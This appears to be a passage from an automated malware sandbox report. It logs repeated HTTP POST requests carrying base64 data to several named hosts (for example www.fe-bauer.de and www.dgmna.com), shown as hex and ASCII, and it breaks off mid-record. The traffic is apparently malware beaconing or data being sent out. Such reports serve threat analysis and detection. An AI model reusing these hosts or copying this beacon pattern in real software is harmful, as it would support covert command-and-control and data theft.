wJNyInPStc9oXdBMunW/xxxpIRzZmaNwV+825d+7r1h5klZdHZ6SgxBc/vfqZj33mLN6rIoSO51l+RfskXQsNo4txWTY2kNGSgJM5atCQS4SnnsIBwxEfYk5R1BBO07wTQ5u2RntaB24qI379nCBDbq5w2eMhG0deyO5Is7MJL3mWzcfR0620jHx0UF2SFLOwKDKvjblghpmORnubQPUlYmYdkYlQInyyFNeuIljJ0zOhlPTCTS4K+Jihexp6Ukw1B3rA2NqTNtMo1o5to/gcHJXvwDLjEF1xHYDP88RAfphKlDZ1Bg/Hi+AoG9V4E1ET4Ee2xMwhdbv0cD78HnwYhgvFKId8E8wTJbluqiHSKHh8cFxjuuzomE7uqndR7Z4tTKrTYMstP9IbSJx1sBxOTlayeShM4dCUz00F4O9aXIl77RpqU+MuoccW951fw24Op+uY6U7gCP8vy8mT3qIySswUPt4gTNT3QjX541M4JomVtAV7MIUiLNP5tJalgmUtxU8ST5Rai6X8YmqaSvkfrYFNuQvdHkJIhFl9T2vBuO/wqky2ULS7dpA3Os=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 77 77 6d 76 5a 4e 2b 6f 72 38 39 6e 31 68 51 7a 50 6d 42 71 51 32 6a 4b 76 6e 79 31 6e 6a 6b 6f 67 35 5a 41 64 77 31 71 65 45 47 56 43 53 38 35 50 57 38 4f 51 71 75 73 4f 63 47 6a 36 72 70 34 35 45 63 7a 69 63 65 67 2f 6b 78 67 77 2f 63 48 6f 4f 67 61 5a 59 7a 34 6a 48 41 75 43 6d 53 38 73 63 43 6b 67 32 41 2b 2f 30 78 50 41 71 30 53 32 57 7a 64 64 6c 42 32 48 4b 72 66 44 2f 39 66 62 69 58 76 30 4b 33 69 58 6f 47 44 38 33 66 65 4a 77 49 6e 4f 32 50 46 4f 4e 58 66 49 48 7a 2f 39 63 32 56 64 6b 59 42 6a 48 43 45 4d 4c 53 67 6b 6d 5a 71 62 47 50 4d 4d 58 63 6b 51 37 69 6e 38 38 5a 74 2f 52 6f 57 37 6f 33 6c 2b 55 53 55 79 34 48 67 39 33 57 63 70 6d 48 4a 4b 4d 4f 37 75 41 32 75 79 4c 6b 42 69 4d 76 73 5a 44 77 6a 31 59 69 34 35 67 4f 73 30 53 78 54 45 73 57 38 35 64 65 4d 6d 51 39 76 56 37 78 37 48 44 48 5a 65 4f 6c 77 47 4d 34 31 39 54 4f 45 62 70 78 57 31 31 37 74 31 43 47 73 79 39 77 6d 48 77 4f 76 36 67 37 66 62 51 31 55 6d 63 41 55 4d 6c 6c 75 64 7a 59 64 32 72 67 32 66 32 30 38 51 57 38 5a 4b 33 33 46 57 2b 70 55 36 52 37 6f 71 34 35 38 55 38 63 6b 4e 75 2f 39 44 70 41 4a 6f 6f 67 36 62 68 70 6d 4f 4f 65 48 6b 78 79 35 54 6e 30 38 57 49 65 4a 51 70 4d 39 51 52 77 6e 37 73 65 67 79 43 48 57 6b 4a 77 39 65 4c 54 31 76 6c 50 76 33 75 4e 51 50 44 75 75 55 52 34 48 61 31 50 6e 39 4c 49 71 4f 49 4f 79 76 36 6d 49 30 51 46 7a 45 64 64 42 69 61 4a 74 53 57 2b 31 56 30 30 4e 6b 61 62 6f 64 74 4c 50 49 69 69 46 63 6f 77 54 73 41 5a 55 77 6e 4b 6d 37 39 52 6b 6b 4e 5a 44 4c 45 56 58 63 59 70 41 52 4a 41 4e 38 58 77 42 66 4e 74 57 61 57 6f 49 49 58 7a 46 7a 44 66 7a 6b 69 2f 32 50 32 45 57 65 4e 76 5a 4f 69 38 4d 45 6c 68 51 72 63 55 53 55 63 6f 42 4a 33 2f 42 52 76 37 69 37 78 4c 4f 38 31 4e 58 43 59 2f 62 35 2f 30 6e 59 5a 49 6e 56 37 36 31 4e 51 3d 3d Data Ascii: wwmvZN+or89n1hQzPmBqQ2jKvny1njkog5ZAdw1qeEGVCS85PW8OQqusOcGj6rp45Ecziceg/kxgw/cHoOgaZYz4jHAuCmS8scCkg2A+/0xPAq0S2WzddlB2HKrfD/9fbiXv0K3iXoGD83feJwInO2PFONXfIHz/9c2VdkYBjHCEMLSgkmZqbGPMMXckQ7in88Zt/RoW7o3l+USUy4Hg93WcpmHJKMO7uA2uyLkBiMvsZDwj1Yi45gOs0SxTEsW85deMmQ9vV7x7HDHZeOlwGM419TOEbpxW117t1CGsy9wmHwOv6g7fbQ1UmcAUMlludzYd2rg2f208QW8ZK33FW+pU6R7oq458U8ckNu/9DpAJoog6bhpmOOeHkxy5Tn08WIeJQpM9QRwn7segyCHWkJw9eLT1vlPv3uNQPDuuUR4Ha1Pn9LIqOIOyv6mI0QFzEddBiaJtSW+1V00NkabodtLPIiiFcowTsAZUwnKm79RkkNZDLEVXcYpARJAN8XwBfNtWaWoIIXzFzDfzki/2P2EWeNvZOi8MElhQrcUSUcoBJ3/BRv7i7xLO81NXCY/b5/0nYZInV761NQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 34 70 59 76 5a 70 6b 46 75 4d 39 38 49 65 6e 4a 71 44 4c 7a 70 6a 4c 56 52 6f 4c 33 57 73 45 58 33 53 6d 53 5a 64 61 6b 72 74 32 61 63 69 4f 6f 67 66 57 4a 6d 2f 4a 73 30 61 43 4b 72 34 75 70 52 62 46 66 2f 50 4e 55 4d 4a 6e 4f 63 70 54 51 44 4a 73 78 35 49 4b 50 49 62 4b 2b 33 35 2b 5a 4b 55 6a 2b 34 6d 5a 74 2f 58 6c 4c 38 6f 46 6c 73 4f 53 56 76 75 58 63 77 39 73 39 58 75 44 65 55 75 50 4c 6d 39 38 55 75 53 2b 4b 31 50 67 78 38 70 62 35 72 33 70 7a 56 32 34 2b 71 53 6a 79 5a 74 4d 42 77 71 65 2f 55 4a 53 6f 67 4b 4d 54 54 38 6a 64 56 4a 76 56 49 2b 52 4f 48 4b 72 52 6a 6f 4b 73 2b 33 37 51 4b 46 52 63 77 67 73 73 78 35 30 39 50 41 4c 41 54 31 34 56 30 45 34 6f 48 68 4c 62 4d 41 5a 50 39 4a 51 57 6f 72 4b 34 30 78 35 34 44 2b 69 79 68 56 55 68 77 73 31 4e 72 6d 63 49 38 4d 2f 4a 4c 5a 6c 57 44 78 35 43 46 42 6c 58 7a 79 42 6a 32 36 61 6a 2f 42 72 72 72 79 68 42 7a 64 75 78 2b 57 53 41 43 4f 53 2f 6e 74 50 55 32 71 6c 73 6e 4c 6d 78 34 2b 4a 38 37 2b 6f 6b 35 62 4e 38 67 68 66 6b 4b 50 67 31 43 57 49 64 65 4c 51 66 61 74 49 79 30 68 4d 58 32 71 31 50 6e 31 67 64 66 42 2f 2b 4a 73 54 52 63 66 50 5a 4a 48 4e 50 4d 39 6c 49 6d 30 49 38 30 31 36 79 78 6c 67 30 6b 4b 5a 73 72 35 4d 4a 78 71 45 71 6e 4c 64 39 4a 4e 49 57 45 38 6b 74 31 48 37 54 67 4c 61 72 5a 2f 33 7a 46 54 2f 74 39 51 34 64 48 44 6a 61 32 4e 50 4b 65 34 39 6b 61 2b 37 6e 56 30 36 46 5a 48 6c 62 44 4a 45 43 4e 57 45 63 6a 65 61 50 39 52 52 53 39 2b 4d 46 33 73 39 68 35 72 4f 72 4a 4c 59 79 41 7a 52 6f 51 67 64 31 74 61 4b 45 6b 6d 53 6f 71 35 4b 70 4b 2b 5a 37 45 55 50 31 63 71 7a 75 49 32 41 3d Data Ascii: 4pYvZpkFuM98IenJqDLzpjLVRoL3WsEX3SmSZdakrt2aciOogfWJm/Js0aCKr4upRbFf/PNUMJnOcpTQDJsx5IKPIbK+35+ZKUj+4mZt/XlL8oFlsOSVvuXcw9s9XuDeUuPLm98UuS+K1Pgx8pb5r3pzV24+qSjyZtMBwqe/UJSogKMTT8jdVJvVI+ROHKrRjoKs+37QKFRcwgssx509PALAT14V0E4oHhLbMAZP9JQWorK40x54D+iyhVUhws1NrmcI8M/JLZlWDx5CFBlXzyBj26aj/BrrryhBzdux+WSACOS/ntPU2qlsnLmx4+J87+ok5bN8ghfkKPg1CWIdeLQfatIy0hMX2q1Pn1gdfB/+JsTRcfPZJHNPM9lIm0I8016yxlg0kKZsr5MJxqEqnLd9JNIWE8kt1H7TgLarZ/3zFT/t9Q4dHDja2NPKe49ka+7nV06FZHlbDJECNWEcjeaP9RRS9+MF3s9h5rOrJLYyAzRoQgd1taKEkmSoq5KpK+Z7EUP1cqzuI2A=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 6d 46 38 69 4c 50 73 69 74 73 2b 75 44 35 54 43 6b 72 77 68 78 65 52 32 42 77 38 42 53 63 42 69 58 77 52 57 42 70 6f 67 73 30 74 42 36 58 52 32 55 6e 72 49 6b 4d 43 55 79 59 6a 44 59 39 31 73 45 54 54 41 44 71 56 47 67 37 69 70 6d 73 75 53 58 72 71 6a 31 52 6e 6c 37 5a 5a 6f 41 50 4d 4b 57 49 5a 41 71 6b 44 2b 5a 35 32 63 32 33 56 6a 55 38 63 71 78 6e 64 79 69 76 4e 6c 4f 44 44 79 4d 79 75 35 6b 38 76 6f 53 6e 47 35 36 70 6b 4e 74 56 54 56 37 45 79 36 6b 6b 37 7a 58 51 77 4d 31 57 47 6f 78 71 48 66 63 42 6f 75 6b 36 78 62 59 77 4c 59 78 52 56 74 4c 51 71 79 39 30 62 58 30 65 69 33 34 56 54 79 6b 59 78 59 46 51 36 42 5a 38 52 56 63 75 53 77 37 43 6f 5a 6b 65 53 78 33 69 4c 6c 4f 47 4c 7a 54 6b 72 45 74 71 67 6f 63 78 52 6d 38 56 53 78 2b 65 33 6a 47 42 45 46 31 2f 4b 72 62 6c 39 33 4c 6e 4e 73 73 79 5a 73 4c 30 62 67 53 49 4b 4d 69 75 76 2f 72 45 48 6e 6f 6d 47 37 31 50 61 7a 4b 53 51 44 32 38 7a 56 59 2b 66 76 6f 70 57 66 6e 2b 39 31 45 79 43 79 66 6f 62 4c 39 4d 62 36 72 39 5a 5a 69 67 70 6e 2f 38 67 72 67 71 46 75 78 34 73 46 78 6d 66 4b 69 2b 76 6d 66 4c 2f 6c 6b 50 63 41 59 5a 34 46 77 51 52 30 41 56 5a 52 2f 52 6a 55 44 6c 78 76 65 42 4a 36 7a 67 36 56 6c 71 44 6b 5a 31 49 77 69 64 6e 31 45 43 6c 55 46 67 4e 72 36 44 59 77 73 4b 35 42 54 74 56 41 74 46 57 46 61 77 74 57 72 64 4e 43 4b 62 64 4d 5a 2f 6b 56 67 2b 56 63 61 38 74 59 49 31 32 71 56 64 7a 77 41 4f 54 42 50 4e 47 52 6a 36 43 34 65 68 49 50 79 31 36 59 64 45 48 37 64 70 62 49 78 30 50 54 41 2f 73 45 65 2f 44 54 73 36 4f 51 67 7a 35 55 4e 4f 32 30 68 35 73 6b 6b 36 71 49 55 4e 37 65 4e 41 48 37 52 42 6e 57 77 6a 39 73 4c 70 7a 30 56 73 58 72 6a 6c 31 62 57 74 47 75 42 68 47 59 38 6c 6c 79 32 69 37 63 31 72 36 52 Data Ascii: mF8iLPsits+uD5TCkrwhxeR2Bw8BScBiXwRWBpogs0tB6XR2UnrIkMCUyYjDY91sETTADqVGg7ipmsuSXrqj1Rnl7ZZoAPMKWIZAqkD+Z52c23VjU8cqxndyivNlODDyMyu5k8voSnG56pkNtVTV7Ey6kk7zXQwM1WGoxqHfcBouk6xbYwLYxRVtLQqy90bX0ei34VTykYxYFQ6BZ8RVcuSw7CoZkeSx3iLlOGLzTkrEtqgocxRm8VSx+e3jGBEF1/Krbl93LnNssyZsL0bgSIKMiuv/rEHnomG71PazKSQD28zVY+fvopWfn+91EyCyfobL9Mb6r9ZZigpn/8grgqFux4sFxmfKi+vmfL/lkPcAYZ4FwQR0AVZR/RjUDlxveBJ6zg6VlqDkZ1Iwidn1EClUFgNr6DYwsK5BTtVAtFWFawtWrdNCKbdMZ/kVg+Vca8tYI12qVdzwAOTBPNGRj6C4ehIPy16YdEH7dpbIx0PTA/sEe/DTs6OQgz5UNO20h5skk6qIUN7eNAH7RBnWwj9sLpz0VsXrjl1bWtGuBhGY8lly2i7c1r6R
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 71 36 36 7a 61 65 59 69 75 4d 39 69 32 6b 58 6e 67 56 30 6d 6a 77 6e 5a 75 65 44 47 4b 75 77 57 65 67 56 34 44 67 48 37 52 2b 57 32 44 6f 68 58 4a 50 49 41 4e 4f 66 49 6a 5a 30 59 56 46 37 62 30 44 42 2f 38 67 4a 34 4b 78 74 52 4d 2b 44 51 72 77 51 6e 51 38 64 67 4b 67 4b 45 77 47 47 64 76 45 70 69 55 4a 62 34 61 4a 53 61 33 43 52 79 79 35 58 32 36 6a 39 44 62 49 63 51 76 63 67 4b 62 58 50 52 67 63 77 4d 7a 65 6c 41 54 31 45 30 69 68 6a 6d 6e 65 6d 4b 35 4e 74 57 56 66 51 38 41 68 43 4b 67 34 39 37 4c 2f 34 70 32 48 62 47 72 67 79 62 78 47 61 46 69 53 46 37 73 63 75 30 6e 49 6a 38 72 33 4f 74 42 46 30 49 36 54 5a 6c 75 55 56 42 45 69 7a 70 75 4c 51 4c 2f 36 55 55 69 6b 59 46 76 35 30 4f 37 6d 37 62 44 47 37 56 48 6b 42 32 6b 44 31 48 4a 65 78 39 77 74 79 58 45 47 67 57 63 62 4c 76 6a 46 44 6f 39 63 77 6b 6f 72 64 69 6c 6a 6c 55 45 43 6d 4f 39 79 38 32 38 61 61 79 79 53 4d 65 51 74 4f 64 4d 75 4e 75 54 6e 6c 6e 67 4d 61 67 6e 30 5a 4a 34 57 55 56 45 34 4c 35 37 62 43 42 65 2f 49 64 39 7a 63 35 75 42 76 71 41 53 52 7a 55 6d 68 7a 41 66 69 56 4c 32 36 65 57 30 43 4c 54 4a 42 51 55 73 4b 31 6b 56 34 45 53 42 77 37 57 2b 5a 54 70 44 74 54 52 37 63 45 4e 44 49 61 73 54 32 6e 30 30 71 46 4e 43 6a 78 69 4b 55 54 6d 6f 65 57 31 44 70 54 41 54 39 46 67 4b 30 63 54 31 5a 38 34 63 6f 32 33 53 70 4e 37 4a 6d 52 7a 45 6d 48 62 63 53 33 76 4e 39 2f 6e 5a 63 4b 49 51 46 4c 4d 6d 6b 4e 44 7a 44 4b 61 72 70 4e 2f 55 44 53 41 59 5a 65 42 6d 46 71 56 76 30 6f 54 6f 6e 71 4a 77 47 32 54 55 2b 65 63 5a 5a 34 6b 51 45 79 54 70 4d 56 4e 56 39 47 35 71 31 44 61 54 50 43 4f 65 42 43 5a 39 4f 34 45 51 3d 3d Data Ascii: q66zaeYiuM9i2kXngV0mjwnZueDGKuwWegV4DgH7R+W2DohXJPIANOfIjZ0YVF7b0DB/8gJ4KxtRM+DQrwQnQ8dgKgKEwGGdvEpiUJb4aJSa3CRyy5X26j9DbIcQvcgKbXPRgcwMzelAT1E0ihjmnemK5NtWVfQ8AhCKg497L/4p2HbGrgybxGaFiSF7scu0nIj8r3OtBF0I6TZluUVBEizpuLQL/6UUikYFv50O7m7bDG7VHkB2kD1HJex9wtyXEGgWcbLvjFDo9cwkordiljlUECmO9y828aayySMeQtOdMuNuTnlngMagn0ZJ4WUVE4L57bCBe/Id9zc5uBvqASRzUmhzAfiVL26eW0CLTJBQUsK1kV4ESBw7W+ZTpDtTR7cENDIasT2n00qFNCjxiKUTmoeW1DpTAT9FgK0cT1Z84co23SpN7JmRzEmHbcS3vN9/nZcKIQFLMmkNDzDKarpN/UDSAYZeBmFqVv0oTonqJwG2TU+ecZZ4kQEyTpMVNV9G5q1DaTPCOeBCZ9O4EQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 77 4a 4e 79 49 6e 50 53 74 63 39 6f 58 64 42 4d 75 6e 57 2f 78 78 78 70 49 52 7a 5a 6d 61 4e 77 56 2b 38 32 35 64 2b 37 72 31 68 35 6b 6c 5a 64 48 5a 36 53 67 78 42 63 2f 76 66 71 5a 6a 33 33 6d 4c 4e 36 72 49 6f 53 4f 35 31 6c 2b 52 66 73 6b 58 51 73 4e 6f 34 74 78 57 54 59 32 6b 4e 47 53 67 4a 4d 35 61 74 43 51 53 34 53 6e 6e 73 49 42 77 78 45 66 59 6b 35 52 31 42 42 4f 30 37 77 54 51 35 75 32 52 6e 74 61 42 32 34 71 49 33 37 39 6e 43 42 44 62 71 35 77 32 65 4d 68 47 30 64 65 79 4f 35 49 73 37 4d 4a 4c 33 6d 57 7a 63 66 52 30 36 32 30 6a 48 78 30 55 46 32 53 46 4c 4f 77 4b 44 4b 76 6a 62 6c 67 68 70 6d 4f 52 6e 75 62 51 50 55 6c 59 6d 59 64 6b 59 6c 51 49 6e 79 79 46 4e 65 75 49 6c 6a 4a 30 7a 4f 68 6c 50 54 43 54 53 34 4b 2b 4a 69 68 65 78 70 36 55 6b 77 31 42 33 72 41 32 4e 71 54 4e 74 4d 6f 31 6f 35 74 6f 2f 67 63 48 4a 58 76 77 44 4c 6a 45 46 31 78 48 59 44 50 38 38 52 41 66 70 68 4b 6c 44 5a 31 42 67 2f 48 69 2b 41 6f 47 39 56 34 45 31 45 54 34 45 65 32 78 4d 77 68 64 62 76 30 63 44 37 38 48 6e 77 59 68 67 76 46 4b 49 64 38 45 38 77 54 4a 62 6c 75 71 69 48 53 4b 48 68 38 63 46 78 6a 75 75 7a 6f 6d 45 37 75 71 6e 64 52 37 5a 34 74 54 4b 72 54 59 4d 73 74 50 39 49 62 53 4a 78 31 73 42 78 4f 54 6c 61 79 65 53 68 4d 34 64 43 55 7a 30 30 46 34 4f 39 61 58 49 6c 37 37 52 70 71 55 2b 4d 75 6f 63 63 57 39 35 31 66 77 32 34 4f 70 2b 75 59 36 55 37 67 43 50 38 76 79 38 6d 54 33 71 49 79 53 73 77 55 50 74 34 67 54 4e 54 33 51 6a 58 35 34 31 4d 34 4a 6f 6d 56 74 41 56 37 4d 49 55 69 4c 4e 50 35 74 4a 61 6c 67 6d 55 74 78 55 38 53 54 35 52 61 69 36 58 38 59 6d 71 61 53 76 6b 66 72 59 46 4e 75 51 76 64 48 6b 4a 49 68 46 6c 39 54 32 76 42 75 4f 2f 77 71 6b 79 32 55 4c 53 37 64 70 41 33 4f 73 3d Data Ascii: wJNyInPStc9oXdBMunW/xxxpIRzZmaNwV+825d+7r1h5klZdHZ6SgxBc/vfqZj33mLN6rIoSO51l+RfskXQsNo4txWTY2kNGSgJM5atCQS4SnnsIBwxEfYk5R1BBO07wTQ5u2RntaB24qI379nCBDbq5w2eMhG0deyO5Is7MJL3mWzcfR0620jHx0UF2SFLOwKDKvjblghpmORnubQPUlYmYdkYlQInyyFNeuIljJ0zOhlPTCTS4K+Jihexp6Ukw1B3rA2NqTNtMo1o5to/gcHJXvwDLjEF1xHYDP88RAfphKlDZ1Bg/Hi+AoG9V4E1ET4Ee2xMwhdbv0cD78HnwYhgvFKId8E8wTJbluqiHSKHh8cFxjuuzomE7uqndR7Z4tTKrTYMstP9IbSJx1sBxOTlayeShM4dCUz00F4O9aXIl77RpqU+MuoccW951fw24Op+uY6U7gCP8vy8mT3qIySswUPt4gTNT3QjX541M4JomVtAV7MIUiLNP5tJalgmUtxU8ST5Rai6X8YmqaSvkfrYFNuQvdHkJIhFl9T2vBuO/wqky2ULS7dpA3Os=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 69 62 76 6f 70 71 34 66 75 73 2b 47 76 6a 42 6f 75 65 4e 2f 43 52 47 5a 6f 64 77 75 57 2f 7a 34 77 75 49 35 58 52 58 72 42 63 76 68 50 51 7a 76 47 58 45 51 71 5a 70 6c 69 70 73 51 6c 39 48 79 71 2f 57 56 41 49 77 51 75 78 50 4e 31 4d 6a 69 49 38 31 6c 59 66 57 69 2f 4e 67 2b 2f 65 58 42 71 59 4b 6e 6f 59 62 69 77 48 63 55 66 66 70 39 32 7a 76 41 35 54 38 30 58 2f 46 39 36 61 6d 59 2b 31 32 2b 51 65 34 37 30 36 2f 38 2b 79 37 72 52 46 34 6c 64 43 46 63 32 56 6d 74 64 6a 38 64 46 41 64 73 62 6c 74 69 78 66 6f 71 6a 62 68 54 7a 61 53 6a 50 47 53 6a 51 6f 41 47 55 2b 37 65 2b 50 63 75 2b 36 6d 35 72 2f 30 44 45 66 4d 6e 58 6b 79 30 58 36 4a 52 32 51 4f 2b 4d 66 4c 52 5a 51 6d 54 56 6e 58 75 33 74 39 37 70 7a 62 45 76 79 37 2f 70 4c 64 77 6a 2f 4d 65 54 44 38 4e 66 70 77 77 4a 39 6c 5a 4f 35 34 62 51 42 73 6d 6c 32 61 78 39 31 6a 64 65 35 2b 2b 7a 65 59 2f 6d 43 4b 46 47 75 7a 5a 75 47 48 52 56 51 54 59 5a 6b 45 71 30 6a 62 43 48 61 49 42 79 78 46 47 4e 58 4a 64 48 31 76 51 31 32 4a 7a 69 67 6b 66 4e 54 33 7a 2b 37 66 54 32 49 7a 68 50 54 67 33 2b 42 5a 30 63 39 42 32 43 56 50 68 32 31 4e 79 61 64 74 6b 37 61 52 46 64 6e 2b 34 52 64 37 63 63 43 56 46 61 73 35 4a 4b 45 59 43 74 45 4c 38 75 43 53 59 6f 58 48 41 72 45 31 50 57 4f 63 38 76 73 7a 48 70 57 36 36 59 48 41 6c 30 32 4a 77 6f 74 59 4a 2b 64 77 39 67 35 6f 57 68 79 6b 59 49 66 4b 50 57 41 65 63 57 74 52 53 7a 61 6d 71 33 52 6a 77 6f 50 45 6b 6b 36 39 44 57 41 55 33 73 50 54 61 30 61 59 50 30 50 72 45 44 6d 73 59 76 35 43 74 53 65 53 6d 50 52 53 71 32 63 65 4d 39 34 74 32 4a 36 36 56 4f 6d 47 30 6f 50 79 6d 49 59 47 6e 4f 36 6b 56 66 53 79 67 56 35 63 59 78 51 2f 77 45 39 69 5a Data Ascii: ibvopq4fus+GvjBoueN/CRGZodwuW/z4wuI5XRXrBcvhPQzvGXEQqZplipsQl9Hyq/WVAIwQuxPN1MjiI81lYfWi/Ng+/eXBqYKnoYbiwHcUffp92zvA5T80X/F96amY+12+Qe4706/8+y7rRF4ldCFc2Vmtdj8dFAdsbltixfoqjbhTzaSjPGSjQoAGU+7e+Pcu+6m5r/0DEfMnXky0X6JR2QO+MfLRZQmTVnXu3t97pzbEvy7/pLdwj/MeTD8NfpwwJ9lZO54bQBsml2ax91jde5++zeY/mCKFGuzZuGHRVQTYZkEq0jbCHaIByxFGNXJdH1vQ12JzigkfNT3z+7fT2IzhPTg3+BZ0c9B2CVPh21Nyadtk7aRFdn+4Rd7ccCVFas5JKEYCtEL8uCSYoXHArE1PWOc8vszHpW66YHAl02JwotYJ+dw9g5oWhykYIfKPWAecWtRSzamq3RjwoPEkk69DWAU3sPTa0aYP0PrEDmsYv5CtSeSmPRSq2ceM94t2J66VOmG0oPymIYGnO6kVfSygV5cYxQ/wE9iZ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 77 77 6d 76 5a 4e 2b 6f 72 38 39 6e 31 68 51 7a 50 6d 42 71 51 32 6a 4b 76 6e 79 31 6e 6a 6b 6f 67 35 5a 41 64 77 31 71 65 45 47 56 43 53 38 35 50 57 38 4f 51 71 75 73 4f 63 47 6a 36 72 70 34 35 45 63 7a 69 63 65 67 2f 6b 78 67 77 2f 63 48 6f 4f 67 61 5a 59 7a 34 6a 48 41 75 43 6d 53 38 73 63 43 6b 67 32 41 2b 2f 30 78 50 41 71 30 53 32 57 7a 64 64 6c 42 32 48 4b 72 66 44 2f 39 66 62 69 58 76 30 4b 33 69 58 6f 47 44 38 33 66 65 4a 77 49 6e 4f 32 50 46 4f 4e 58 66 49 48 7a 2f 39 63 32 56 64 6b 59 42 6a 48 43 45 4d 4c 53 67 6b 6d 5a 71 62 47 50 4d 4d 58 63 6b 51 37 69 6e 38 38 5a 74 2f 52 6f 57 37 6f 33 6c 2b 55 53 55 79 34 48 67 39 33 57 63 70 6d 48 4a 4b 4d 4f 37 75 41 32 75 79 4c 6b 42 69 4d 76 73 5a 44 77 6a 31 59 69 34 35 67 4f 73 30 53 78 54 45 73 57 38 35 64 65 4d 6d 51 39 76 56 37 78 37 48 44 48 5a 65 4f 6c 77 47 4d 34 31 39 54 4f 45 62 70 78 57 31 31 37 74 31 43 47 73 79 39 77 6d 48 77 4f 76 36 67 37 66 62 51 31 55 6d 63 41 55 4d 6c 6c 75 64 7a 59 64 32 72 67 32 66 32 30 38 51 57 38 5a 4b 33 33 46 57 2b 70 55 36 52 37 6f 71 34 35 38 55 38 63 6b 4e 75 2f 39 44 70 41 4a 6f 6f 67 36 62 68 70 6d 4f 4f 65 48 6b 78 79 35 54 6e 30 38 57 49 65 4a 51 70 4d 39 51 52 77 6e 37 73 65 67 79 43 48 57 6b 4a 77 39 65 4c 54 31 76 6c 50 76 33 75 4e 51 50 44 75 75 55 52 34 48 61 31 50 6e 39 4c 49 71 4f 49 4f 79 76 36 6d 49 30 51 46 7a 45 64 64 42 69 61 4a 74 53 57 2b 31 56 30 30 4e 6b 61 62 6f 64 74 4c 50 49 69 69 46 63 6f 77 54 73 41 5a 55 77 6e 4b 6d 37 39 52 6b 6b 4e 5a 44 4c 45 56 58 63 59 70 41 52 4a 41 4e 38 58 77 42 66 4e 74 57 61 57 6f 49 49 58 7a 46 7a 44 66 7a 6b 69 2f 32 50 32 45 57 65 4e 76 5a 4f 69 38 4d 45 6c 68 51 72 63 55 53 55 63 6f 42 4a 33 2f 42 52 76 37 69 37 78 4c 4f 38 31 4e 58 43 59 2f 62 35 2f 30 6e 59 5a 49 6e 56 37 36 31 4e 51 3d 3d Data Ascii: wwmvZN+or89n1hQzPmBqQ2jKvny1njkog5ZAdw1qeEGVCS85PW8OQqusOcGj6rp45Ecziceg/kxgw/cHoOgaZYz4jHAuCmS8scCkg2A+/0xPAq0S2WzddlB2HKrfD/9fbiXv0K3iXoGD83feJwInO2PFONXfIHz/9c2VdkYBjHCEMLSgkmZqbGPMMXckQ7in88Zt/RoW7o3l+USUy4Hg93WcpmHJKMO7uA2uyLkBiMvsZDwj1Yi45gOs0SxTEsW85deMmQ9vV7x7HDHZeOlwGM419TOEbpxW117t1CGsy9wmHwOv6g7fbQ1UmcAUMlludzYd2rg2f208QW8ZK33FW+pU6R7oq458U8ckNu/9DpAJoog6bhpmOOeHkxy5Tn08WIeJQpM9QRwn7segyCHWkJw9eLT1vlPv3uNQPDuuUR4Ha1Pn9LIqOIOyv6mI0QFzEddBiaJtSW+1V00NkabodtLPIiiFcowTsAZUwnKm79RkkNZDLEVXcYpARJAN8XwBfNtWaWoIIXzFzDfzki/2P2EWeNvZOi8MElhQrcUSUcoBJ3/BRv7i7xLO81NXCY/b5/0nYZInV761NQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 6d 46 38 69 4c 50 73 69 74 73 2b 75 44 35 54 43 6b 72 77 68 78 65 52 32 42 77 38 42 53 63 42 69 58 77 52 57 42 70 6f 67 73 30 74 42 36 58 52 32 55 6e 72 49 6b 4d 43 55 79 59 6a 44 59 39 31 73 45 54 54 41 44 71 56 47 67 37 69 70 6d 73 75 53 58 72 71 6a 31 52 6e 6c 37 5a 5a 6f 41 50 4d 4b 57 49 5a 41 71 6b 44 2b 5a 35 32 63 32 33 56 6a 55 38 63 71 78 6e 64 79 69 76 4e 6c 4f 44 44 79 4d 79 75 35 6b 38 76 6f 53 6e 47 35 36 70 6b 4e 74 56 54 56 37 45 79 36 6b 6b 37 7a 58 51 77 4d 31 57 47 6f 78 71 48 66 63 42 6f 75 6b 36 78 62 59 77 4c 59 78 52 56 74 4c 51 71 79 39 30 62 58 30 65 69 33 34 56 54 79 6b 59 78 59 46 51 36 42 5a 38 52 56 63 75 53 77 37 43 6f 5a 6b 65 53 78 33 69 4c 6c 4f 47 4c 7a 54 6b 72 45 74 71 67 6f 63 78 52 6d 38 56 53 78 2b 65 33 6a 47 42 45 46 31 2f 4b 72 62 6c 39 33 4c 6e 4e 73 73 79 5a 73 4c 30 62 67 53 49 4b 4d 69 75 76 2f 72 45 48 6e 6f 6d 47 37 31 50 61 7a 4b 53 51 44 32 38 7a 56 59 